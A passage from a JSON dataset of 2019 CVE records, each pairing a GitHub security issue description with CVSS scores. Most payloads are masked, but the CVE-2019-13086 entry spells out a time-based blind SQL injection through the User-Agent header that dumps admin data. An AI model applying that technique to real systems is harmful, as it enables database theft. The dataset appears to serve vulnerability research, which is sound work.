  35654. "description": "SECURITY: two privilege escalation from regular user to root. APITAG for the dramatic subject.) Well, it's really disappointing and unprofessional to come to this... Two months ago NUMBERTAG I disclosed two privilege escalation vulnerabilities to EMAILTAG (and eventually also to EMAILTAG and EMAILTAG ), I obtained no useful replies or actions so I'm trying to reach a wider audience by opening an issue here (and no, I won't join the forum). As today the two vulnerabilities are still undisclosed as I fairly believe that a responsible disclosure approach is the right way to go. Yet we're pushing the boundaries here and I don't think the maintainers are being respectful of the userbase. So this is my last attempt to get these issues fixed, after that I will disclose them anyway, fixed or not. Users having write access to this repo can reach me privately for details, it's even better if they reply to the original message sent to the above EMAILTAG addresses, provided that they're allowed to do that.",
  35655. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  35656. "severity": "HIGH",
  35657. "baseScore": 8.8,
  35658. "impactScore": 5.9,
  35659. "exploitabilityScore": 2.8
  35660. },
  35661. {
  35662. "CVE_ID": "CVE-2019-12802",
  35663. "Issue_Url_old": "https://github.com/radare/radare2/issues/14296",
  35664. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/14296",
  35665. "Repo_new": "radareorg/radare2",
  35666. "Issue_Created_At": "2019-06-13T18:56:39Z",
  35667. "description": "Ragg2 Lacks Boundary Check when Changing Context . Ragg2 lacks boundary check when changing context in here URLTAG . When APITAG or APITAG , CTX would be out of boundary. As a result, it could cause both invalid memory access and invalid free. Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG a NUMBERTAG ca commit: APITAG build NUMBERTAG Expected behavior NO CRASH Actual behavior Invalid Memory Access APITAG Invalid Free ERRORTAG Steps to reproduce the behavior Follow actions mentioned above. Additional Logs, screenshots, source code, configuration dump, ... Invalid Memory Access FILETAG Output of valgrind: ERRORTAG Invalid Free FILETAG Output of valgrind ERRORTAG",
  35668. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  35669. "severity": "HIGH",
  35670. "baseScore": 7.8,
  35671. "impactScore": 5.9,
  35672. "exploitabilityScore": 1.8
  35673. },
  35674. {
  35675. "CVE_ID": "CVE-2019-12814",
  35676. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2341",
  35677. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2341",
  35678. "Repo_new": "fasterxml/jackson-databind",
  35679. "Issue_Created_At": "2019-06-04T04:08:07Z",
  35680. "description": "Block yet another gadget type (CVE to be requested). Similar to other polymorphic types with no limits, but for XXE with APITAG . Need to request CVE ID.",
  35681. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  35682. "severity": "MEDIUM",
  35683. "baseScore": 5.9,
  35684. "impactScore": 3.6,
  35685. "exploitabilityScore": 2.2
  35686. },
  35687. {
  35688. "CVE_ID": "CVE-2019-12822",
  35689. "Issue_Url_old": "https://github.com/embedthis/goahead/issues/285",
  35690. "Issue_Url_new": "https://github.com/embedthis/goahead/issues/285",
  35691. "Repo_new": "embedthis/goahead",
  35692. "Issue_Created_At": "2019-06-14T02:14:42Z",
  35693. "description": "Header parsing causing invalid memory reference. Overview A security vulnerability affecting APITAG versions NUMBERTAG has been identified. This bulletin discusses this flaw and its implications. Summary An invalid set of HTTP headers may trigger an out of bounds memory access. Description The following request will trigger a memory assertion and subsequent out of bounds memory access. Depending on the system, compiler, operating environment and configuration, this could lead corrupted execution and a denial of service. APITAG Threat Scope Versions up to and including NUMBERTAG Remedy Upgrade to NUMBERTAG when released or apply the following patch: ERRORTAG Please contact Embedthis if you require further information, test code or assistance at EMAILTAG . References APITAG Issue URLTAG CVE CVE pending. Thanks Thanks to Yakun Zhang and Zheng Huang of Baidu Security Lab for finding and diagnosing this issue.",
  35694. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  35695. "severity": "HIGH",
  35696. "baseScore": 7.5,
  35697. "impactScore": 3.6,
  35698. "exploitabilityScore": 3.9
  35699. },
  35700. {
  35701. "CVE_ID": "CVE-2019-12829",
  35702. "Issue_Url_old": "https://github.com/radare/radare2/issues/14303",
  35703. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/14303",
  35704. "Repo_new": "radareorg/radare2",
  35705. "Issue_Created_At": "2019-06-15T04:49:02Z",
  35706. "description": "Function r_parse_parse Lacks Boundary Check. For APITAG (and other APITAG function parse URLTAG lacks a boundary check for newstr , leading heap /stack based buffer over write. Such buffer overflow could be trigger from rasm2 URLTAG . As r_parse_parse URLTAG , which actually calls function parse URLTAG for APITAG could extend APITAG and write back to APITAG , it would cause a heap based buffer over write. Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG ga1ade7d NUMBERTAG commit: APITAG build NUMBERTAG Expected behavior NO CRASH Actual behavior CODETAG Steps to reproduce the behavior Follow actions mentioned above. Additional Logs, screenshots, source code, configuration dump, ... Output of valgrind: FILETAG",
  35707. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  35708. "severity": "HIGH",
  35709. "baseScore": 7.5,
  35710. "impactScore": 3.6,
  35711. "exploitabilityScore": 3.9
  35712. },
  35713. {
  35714. "CVE_ID": "CVE-2019-12835",
  35715. "Issue_Url_old": "https://github.com/JayXon/Leanify/issues/52",
  35716. "Issue_Url_new": "https://github.com/jayxon/leanify/issues/52",
  35717. "Repo_new": "jayxon/leanify",
  35718. "Issue_Created_At": "2019-05-24T18:22:27Z",
  35719. "description": "Fuzzing Tests: OOB Write in XML Parser. Controlled Length Out of Bounds Write Using the corpus of test files from the previous crash I also included an XML file. The crash is relative to the XML library implementation of Leanify resulting in another issue with an OOB write independent of the fixed OOB APITAG in ICO. I discovered this via fuzzing and did some light root cause analysis and another party heavily expanded on the exploitability of this issue. Details below: A moderately controllable memory corruption vulnerability affects the implementation of xml_memory_writer in APITAG as shown below: ++ struct xml_memory_writer : pugi::xml_writer { uint8_t p_write; void write(const void data, size_t size) override { memcpy(p_write, data, size); Line NUMBERTAG p_write += size; } }; } // namespace pugi::xml_writer implementations should additionally track the capacity of the target buffer as shown in the pugixml documentation here: FILETAG It is possible to control the amount of data written past the end of the buffer by appending characters that require escaping as shown in the text_output_escaped function in APITAG as shown below: ++ PUGI__FN void APITAG writer, const char_t s, chartypex_t type, unsigned int flags) { / TRUNCATED / switch ( s) { case NUMBERTAG break; case '&': APITAG 'a', 'm', 'p', ';'); ++s; break; case ' APITAG ': APITAG 'g', 't', ';'); ++s; break; case '\"': APITAG 'q', 'u', 'o', 't', ';'); ++s; break; default: // s is not a usual symbol { unsigned int ch = static_cast<unsigned int>( s++); assert(ch APITAG ((ch NUMBERTAG static_cast APITAG ((ch NUMBERTAG TRUNCATED / The following base NUMBERTAG test case will crash the target binary by expanding a number of & to the escaped &amp; (a gain of NUMBERTAG bytes in extension). APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG For full stack trace on the crash, see the ASAN output below: APITAG NUMBERTAG ERROR: APITAG unknown crash on address NUMBERTAG b7fce NUMBERTAG at pc NUMBERTAG b7af7a NUMBERTAG bp NUMBERTAG bfffc8f8 sp NUMBERTAG bfffc4cc WRITE of size NUMBERTAG at NUMBERTAG b7fce NUMBERTAG thread T NUMBERTAG b7af7a NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG b7af7c2f in memcpy ( PATHTAG NUMBERTAG a NUMBERTAG c in (anonymous APITAG const , unsigned int) [clone . APITAG APITAG NUMBERTAG d NUMBERTAG e in flush PATHTAG NUMBERTAG d NUMBERTAG in pugi::impl::(anonymous APITAG [clone . APITAG PATHTAG NUMBERTAG bfed4 in APITAG char const , unsigned int, pugi::xml_encoding) const PATHTAG NUMBERTAG b5fe in APITAG int) APITAG NUMBERTAG af NUMBERTAG in APITAG , unsigned int, unsigned int, APITAG std::char_traits APITAG , std::allocator APITAG > const &) PATHTAG NUMBERTAG b NUMBERTAG c2 in APITAG PATHTAG NUMBERTAG b1cde in main PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG PATHTAG ) The testfile was generated using the AFL fuzzer by lcamtuf.",
  35720. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35721. "severity": "CRITICAL",
  35722. "baseScore": 9.8,
  35723. "impactScore": 5.9,
  35724. "exploitabilityScore": 3.9
  35725. },
  35726. {
  35727. "CVE_ID": "CVE-2019-12865",
  35728. "Issue_Url_old": "https://github.com/radare/radare2/issues/14334",
  35729. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/14334",
  35730. "Repo_new": "radareorg/radare2",
  35731. "Issue_Created_At": "2019-06-17T05:08:54Z",
  35732. "description": "Double Free in cmd_mount Causes Crash. Function cmd_mount URLTAG would Double Free cwd URLTAG via malicious commands. Basically, first command ms to get in fs_shell URLTAG would cause cwd = strdup(path) URLTAG . After returning from fs_shell, r2 will free cwd URLTAG . Note that cwd is not reset as NULL. Later, command ERRORTAG would let r2 goes into r_fs_shell_prompt URLTAG , but returns here URLTAG without resetting cwd . Then, cwd is double freed. Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | malloc NUMBERTAG Architecture/bits of the file (mandatory) | None | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG b8e2d5 commit: APITAG build NUMBERTAG Expected behavior NO CRASH Actual behavior ERRORTAG Steps to reproduce the behavior Follow actions mentioned above Additional Logs, screenshots, source code, configuration dump, ... This double free could be fixed by replacing free as APITAG here URLTAG Output of valgrind ERRORTAG",
  35733. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  35734. "severity": "MEDIUM",
  35735. "baseScore": 5.5,
  35736. "impactScore": 3.6,
  35737. "exploitabilityScore": 1.8
  35738. },
  35739. {
  35740. "CVE_ID": "CVE-2019-12872",
  35741. "Issue_Url_old": "https://github.com/dotCMS/core/issues/16624",
  35742. "Issue_Url_new": "https://github.com/dotcms/core/issues/16624",
  35743. "Repo_new": "dotcms/core",
  35744. "Issue_Created_At": "2019-05-28T15:06:21Z",
  35745. "description": "APITAG for Security Issue. This is a placeholder for a reported security issue details can be be found here: URLTAG",
  35746. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  35747. "severity": "HIGH",
  35748. "baseScore": 7.2,
  35749. "impactScore": 5.9,
  35750. "exploitabilityScore": 1.2
  35751. },
  35752. {
  35753. "CVE_ID": "CVE-2019-12950",
  35754. "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2638",
  35755. "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2638",
  35756. "Repo_new": "nilsteampassnet/teampass",
  35757. "Issue_Created_At": "2019-06-25T14:22:03Z",
  35758. "description": "Stored XSS. Steps to reproduce NUMBERTAG Create a CSV file with the following data: ERRORTAG NUMBERTAG From Teampass, go select APITAG items\" feature NUMBERTAG On the CSV tab, select the file previously created NUMBERTAG Select the item with XSS payload to import That's all... we can tap to item and XSS payload will be executed. FILETAG",
  35759. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  35760. "severity": "MEDIUM",
  35761. "baseScore": 5.4,
  35762. "impactScore": 2.7,
  35763. "exploitabilityScore": 2.3
  35764. },
  35765. {
  35766. "CVE_ID": "CVE-2019-12966",
  35767. "Issue_Url_old": "https://github.com/zxlie/FeHelper/issues/63",
  35768. "Issue_Url_new": "https://github.com/zxlie/fehelper/issues/63",
  35769. "Repo_new": "zxlie/fehelper",
  35770. "Issue_Created_At": "2019-06-26T03:36:43Z",
  35771. "description": "arbitrary code execution when formating json. poc: ERRORTAG FILETAG FILETAG when the web with single js content, it may result code execution. (it shouldn't be executed when broswe a single js file without any html tag). I discovered the insecure code in APITAG , line NUMBERTAG to line NUMBERTAG additionally, I understand the code is compatibilized for bad json content like APITAG , but as a result, it's insecure.",
  35772. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35773. "severity": "CRITICAL",
  35774. "baseScore": 9.8,
  35775. "impactScore": 5.9,
  35776. "exploitabilityScore": 3.9
  35777. },
  35778. {
  35779. "CVE_ID": "CVE-2019-12974",
  35780. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1515",
  35781. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1515",
  35782. "Repo_new": "imagemagick/imagemagick",
  35783. "Issue_Created_At": "2019-03-21T03:25:02Z",
  35784. "description": "Null pointer deference in function APITAG in coders/pango.c. Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a null pointer deference vulnerablity in function APITAG in coders/pango.c ERRORTAG ( URLTAG The return value of APITAG may be NULL, and then there is a null pointer deference. See CVETAG and URLTAG for details.",
  35785. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  35786. "severity": "MEDIUM",
  35787. "baseScore": 5.5,
  35788. "impactScore": 3.6,
  35789. "exploitabilityScore": 1.8
  35790. },
  35791. {
  35792. "CVE_ID": "CVE-2019-12975",
  35793. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1517",
  35794. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1517",
  35795. "Repo_new": "imagemagick/imagemagick",
  35796. "Issue_Created_At": "2019-03-21T06:25:46Z",
  35797. "description": "Possible but rare memory leak in function APITAG Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a possible but rare memory leak in function APITAG in coders/dpx.c. ERRORTAG We should call ERRORTAG when condition APITAG satisfies behind for loop. See commit URLTAG for more details.",
  35798. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  35799. "severity": "MEDIUM",
  35800. "baseScore": 5.5,
  35801. "impactScore": 3.6,
  35802. "exploitabilityScore": 1.8
  35803. },
  35804. {
  35805. "CVE_ID": "CVE-2019-12976",
  35806. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1520",
  35807. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1520",
  35808. "Repo_new": "imagemagick/imagemagick",
  35809. "Issue_Created_At": "2019-03-21T07:25:10Z",
  35810. "description": "Memory leak in function APITAG Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a memory leak in function APITAG in coders/pcl.c. ERRORTAG We should call APITAG before return statement. CODETAG",
  35811. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  35812. "severity": "MEDIUM",
  35813. "baseScore": 5.5,
  35814. "impactScore": 3.6,
  35815. "exploitabilityScore": 1.8
  35816. },
  35817. {
  35818. "CVE_ID": "CVE-2019-12977",
  35819. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1518",
  35820. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1518",
  35821. "Repo_new": "imagemagick/imagemagick",
  35822. "Issue_Created_At": "2019-03-21T06:44:34Z",
  35823. "description": "Use of uninitialized value in function APITAG Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There a use of uninitialized value vulnerability in function APITAG in coders/jp2.c. CODETAG URLTAG We should call APITAG after declaration. See CVETAG URLTAG and APITAG for detail.",
  35824. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  35825. "severity": "HIGH",
  35826. "baseScore": 7.8,
  35827. "impactScore": 5.9,
  35828. "exploitabilityScore": 1.8
  35829. },
  35830. {
  35831. "CVE_ID": "CVE-2019-12978",
  35832. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1519",
  35833. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1519",
  35834. "Repo_new": "imagemagick/imagemagick",
  35835. "Issue_Created_At": "2019-03-21T06:54:58Z",
  35836. "description": "Use of uninitialized value in function APITAG Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There a use of uninitialized value vulnerability in function APITAG in coders/pango.c. ERRORTAG URLTAG We should call ERRORTAG when condition APITAG satisfies. Otherwise, there will be a use of unintialized value vulnerablity. See CVETAG CVETAG URLTAG and URLTAG for more details.",
  35837. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  35838. "severity": "HIGH",
  35839. "baseScore": 7.8,
  35840. "impactScore": 5.9,
  35841. "exploitabilityScore": 1.8
  35842. },
  35843. {
  35844. "CVE_ID": "CVE-2019-12979",
  35845. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1522",
  35846. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1522",
  35847. "Repo_new": "imagemagick/imagemagick",
  35848. "Issue_Created_At": "2019-03-21T11:58:29Z",
  35849. "description": "Use of uninitialized value in function APITAG Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is an issue in function APITAG in APITAG The issue is similar to CVETAG which was fixed in URLTAG CODETAG Below is the proposal patch. CODETAG",
  35850. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  35851. "severity": "HIGH",
  35852. "baseScore": 7.8,
  35853. "impactScore": 5.9,
  35854. "exploitabilityScore": 1.8
  35855. },
  35856. {
  35857. "CVE_ID": "CVE-2019-12995",
  35858. "Issue_Url_old": "https://github.com/istio/istio/issues/15084",
  35859. "Issue_Url_new": "https://github.com/istio/istio/issues/15084",
  35860. "Repo_new": "istio/istio",
  35861. "Issue_Created_At": "2019-06-24T05:36:31Z",
  35862. "description": "JWT authentication causing APITAG NUMBERTAG terminated with an error\" in Envoy. Bug description I'm trying to implement service to service JWT authentication like something shown in this URLTAG repo. While it's working fine with Auth0, I'm having trouble while setting it up with my company's authentication service. I made the service architecture by following this URLTAG article, you can see my repository here URLTAG . This is the policy I'm applying > CODETAG I'm hosting the public key locally, you can find it FILETAG too. If I hit the service with an invalid access key (say it's expired), I'm getting a NUMBERTAG as expected, but a valid access key gives a ERRORTAG Upon checking the logs for the envoy proxy of the publisher pod, I can see this > ERRORTAG This log message isn't there when working successfully with Auth0, so I think this might be a hint. But looking at the lines in the source code where this log message is present, I can't figure out much.... One reason I think this might occur is the different keys in access token I'm passing. The Auth0 access token has the following keys > CODETAG And my access token looks like this > CODETAG Anybody has any ideas, I've been stuck for quite some time now, any help will be appreciated..! Affected product area (please put an X in all that apply) ] Configuration Infrastructure [ ] Docs [ ] Installation [ ] Networking [ ] Performance and Scalability [x] Policies and Telemetry [x] Security [ ] Test and Release [ ] User Experience [ ] Developer Infrastrcture Expected behavior NUMBERTAG on valid Access Token Steps to reproduce the bug Sadly not possible, as the access token I'm using is private to my company :( Version (include the output of APITAG and kubectl version ) ERRORTAG CODETAG How was Istio installed? Helm template, I followed [this URLTAG article. Environment where bug was observed (cloud vendor, OS, etc) Windows NUMBERTAG running the cluster on Minikube. Additionally, please consider attaching a FILETAG ) by attaching the dump file to this issue.",
  35863. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  35864. "severity": "HIGH",
  35865. "baseScore": 7.5,
  35866. "impactScore": 3.6,
  35867. "exploitabilityScore": 3.9
  35868. },
  35869. {
  35870. "CVE_ID": "CVE-2019-12997",
  35871. "Issue_Url_old": "https://github.com/icon-project/loopchain/issues/231",
  35872. "Issue_Url_new": "https://github.com/icon-project/loopchain/issues/231",
  35873. "Repo_new": "icon-project/loopchain",
  35874. "Issue_Created_At": "2019-06-20T07:49:55Z",
  35875. "description": "Command Injection. Description: Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation. Details: APITAG An attacker can manipulate DEFAULT_SCORE_HOST which is trusted user supplied input, this can be used to inject commands and gain arbitrary code execution. Affected URL: FILETAG Affected Code: APITAG Reference: URLTAG APITAG ERRORTAG",
  35876. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  35877. "severity": "HIGH",
  35878. "baseScore": 8.8,
  35879. "impactScore": 5.9,
  35880. "exploitabilityScore": 2.8
  35881. },
  35882. {
  35883. "CVE_ID": "CVE-2019-13032",
  35884. "Issue_Url_old": "https://github.com/Sigil-Ebook/flightcrew/issues/53",
  35885. "Issue_Url_new": "https://github.com/sigil-ebook/flightcrew/issues/53",
  35886. "Repo_new": "sigil-ebook/flightcrew",
  35887. "Issue_Created_At": "2019-06-26T15:32:15Z",
  35888. "description": "Null Pointer Dereference. Summary An issue was discovered in APITAG NUMBERTAG and earlier. A NULL pointer dereference occurs in APITAG when a null pointer is passed to APITAG Details If the package.opf contains APITAG elements without \"href\" attributes, then the variable \"href\" is set to an empty string on APITAG URLTAG . On APITAG URLTAG , APITAG is called which returns a NULL pointer if href is empty. This pointer is then passed to APITAG which dereferences it, causing a segmentation fault. In the attached FILETAG , you'll see that the href attributes in EPUB/package.opf have been replaced by the attribute \"malformed\". Impact This vulnerability has very little security impact for Sigil users, but may be used as a Denial of Service attack against third party software that uses APITAG as a library. Steps to reproduce NUMBERTAG Download the attached APITAG NUMBERTAG On a linux system, process APITAG using flightcrew cli. APITAG At this point, flightcrew cli will segfault. FILETAG",
  35889. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  35890. "severity": "MEDIUM",
  35891. "baseScore": 5.5,
  35892. "impactScore": 3.6,
  35893. "exploitabilityScore": 1.8
  35894. },
  35895. {
  35896. "CVE_ID": "CVE-2019-13067",
  35897. "Issue_Url_old": "https://github.com/nginx/njs/issues/183",
  35898. "Issue_Url_new": "https://github.com/nginx/njs/issues/183",
  35899. "Repo_new": "nginx/njs",
  35900. "Issue_Created_At": "2019-06-20T12:23:30Z",
  35901. "description": "heap buffer overflow in nxt_utf8_decode APITAG NJS version: CODETAG JS Testcase: ERRORTAG ASAN log: ERRORTAG Found by fluff URLTAG",
  35902. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35903. "severity": "CRITICAL",
  35904. "baseScore": 9.8,
  35905. "impactScore": 5.9,
  35906. "exploitabilityScore": 3.9
  35907. },
  35908. {
  35909. "CVE_ID": "CVE-2019-13068",
  35910. "Issue_Url_old": "https://github.com/grafana/grafana/issues/17718",
  35911. "Issue_Url_new": "https://github.com/grafana/grafana/issues/17718",
  35912. "Repo_new": "grafana/grafana",
  35913. "Issue_Created_At": "2019-06-24T08:15:00Z",
  35914. "description": "HTML injection in panel links (drilldown). You can inject image tags in panel drilldown links (via Title & url fields). There is no script injection as this already sanitized. But for these fields there is no need to have html here. Problem is here: URLTAG Think using escape function when building the html there would solve it. Here is where you can replicate it APITAG",
  35915. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
  35916. "severity": "MEDIUM",
  35917. "baseScore": 5.4,
  35918. "impactScore": 2.5,
  35919. "exploitabilityScore": 2.8
  35920. },
  35921. {
  35922. "CVE_ID": "CVE-2019-13072",
  35923. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2642",
  35924. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2642",
  35925. "Repo_new": "zoneminder/zoneminder",
  35926. "Issue_Created_At": "2019-06-18T00:07:40Z",
  35927. "description": "Stored Cross Site Scripting Filters. APITAG version NUMBERTAG Installed from PPA APITAG Xenial) Ubuntu NUMBERTAG enial The APITAG page in APITAG NUMBERTAG is vulnerable to stored cross site scripting due to improper input sanitation in the APITAG field. This is the latest version available in the Ubuntu NUMBERTAG PPA. Please see attached screenshots. APITAG APITAG Steps to reproduce the behavior NUMBERTAG Go to the APITAG page NUMBERTAG In the APITAG field paste in a javascript payload such as APITAG APITAG NUMBERTAG Refresh the page to verify that the payload executes and remains stored through browser sessions. Expected behavior: The user input fields should be sanitized. Special characters should be limited or escaped to prevent injection of malicious code.",
  35928. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  35929. "severity": "MEDIUM",
  35930. "baseScore": 5.4,
  35931. "impactScore": 2.7,
  35932. "exploitabilityScore": 2.3
  35933. },
  35934. {
  35935. "CVE_ID": "CVE-2019-13086",
  35936. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/19",
  35937. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/19",
  35938. "Repo_new": "cskaza/cszcms",
  35939. "Issue_Created_At": "2019-06-19T14:18:29Z",
  35940. "description": "Bug Report: Time based blind SQL injection Vulnerability in PATHTAG on cszcms NUMBERTAG Title : Time based blind SQL injection Vulnerability in PATHTAG on cszcms NUMBERTAG Date NUMBERTAG June NUMBERTAG Discovered by : MENTIONTAG from ABT Labs Security : high (dump database) Software : FILETAG Description : There is a high risk time based SQL injection vulnerability on the frontend login page( URLTAG Exploit this vulnerability could dump the whole database without login. When login in the frontend login page, if the csrf_csz parameter is removed or padded any string, a log will be recorded in the table 'login_logs' with reason 'CSRF Protection Invalid'. But the 'HTTP_USER_AGENT' field is used directly without any check when inserting the recorded. By constructing a special 'HTTP_USER_AGENT' field, this vulnerability can be exploited. files: PATHTAG FILETAG login page: FILETAG login_logs: FILETAG If remove the csrf_csz paramete and login again, a 'CSRF Protection Invalid' log will be recorded. login_logs: FILETAG Exploit : constructe a HTTP_USER_AGENT, remove the csrf_csz parameter: FILETAG User Agent: ' ( if( condition, sleep NUMBERTAG APITAG If the condition is true, the page will return after NUMBERTAG seconds, otherwise it will return immediately. When UA is ' (if((substr((select email from user_admin limit NUMBERTAG sleep NUMBERTAG APITAG The sql string is INSERT INTO login_logs (email_login, note, result, user_agent, ip_address, timestamp_create) VALUES ('', 'CSRF Protection Invalid', 'CSRF_INVALID', '' (if((substr((select email from user_admin limit NUMBERTAG sleep NUMBERTAG APITAG ', APITAG NUMBERTAG APITAG The insert statement does not actually execute because the last column is not in the correct time format. But the sub select statement will execute, and the sleep will execute if condition is true. FILETAG So, the records in the login_logs table will not increase. The IP will not be added to the blacklist and condition($count NUMBERTAG in line NUMBERTAG is always true. Then you can dump whole database one by one byte. Suggest : Check UA before inserting UA into sql statement",
  35941. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35942. "severity": "CRITICAL",
  35943. "baseScore": 9.8,
  35944. "impactScore": 5.9,
  35945. "exploitabilityScore": 3.9
  35946. },
  35947. {
  35948. "CVE_ID": "CVE-2019-13108",
  35949. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/789",
  35950. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/789",
  35951. "Repo_new": "exiv2/exiv2",
  35952. "Issue_Created_At": "2019-04-24T15:24:45Z",
  35953. "description": "SIGSEGV in APITAG There is a bug at APITAG URLTAG . If APITAG , which happens if ERRORTAG , then Exi NUMBERTAG crashes with a SIGSEGV.",
  35954. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  35955. "severity": "MEDIUM",
  35956. "baseScore": 6.5,
  35957. "impactScore": 3.6,
  35958. "exploitabilityScore": 2.8
  35959. },
  35960. {
  35961. "CVE_ID": "CVE-2019-13109",
  35962. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/790",
  35963. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/790",
  35964. "Repo_new": "exiv2/exiv2",
  35965. "Issue_Created_At": "2019-04-24T15:39:42Z",
  35966. "description": "Integer overflow, leading to very large allocation in APITAG This issue is closely related to NUMBERTAG but the consequences of this bug are different. The calculation of ERRORTAG at APITAG URLTAG can have a negative integer overflow which leads to an NUMBERTAG GB memory allocation in APITAG . Also, the zlib decompression is run on uninitialized memory beyond the end of the buffer, so there is a potential info leak vulnerability here. Here is the APITAG which I have tested on master NUMBERTAG dfdb9 URLTAG : FILETAG . The simplest way to see the bug is to use ulimit to reduce the amount of available memory to less than NUMBERTAG GB: ERRORTAG",
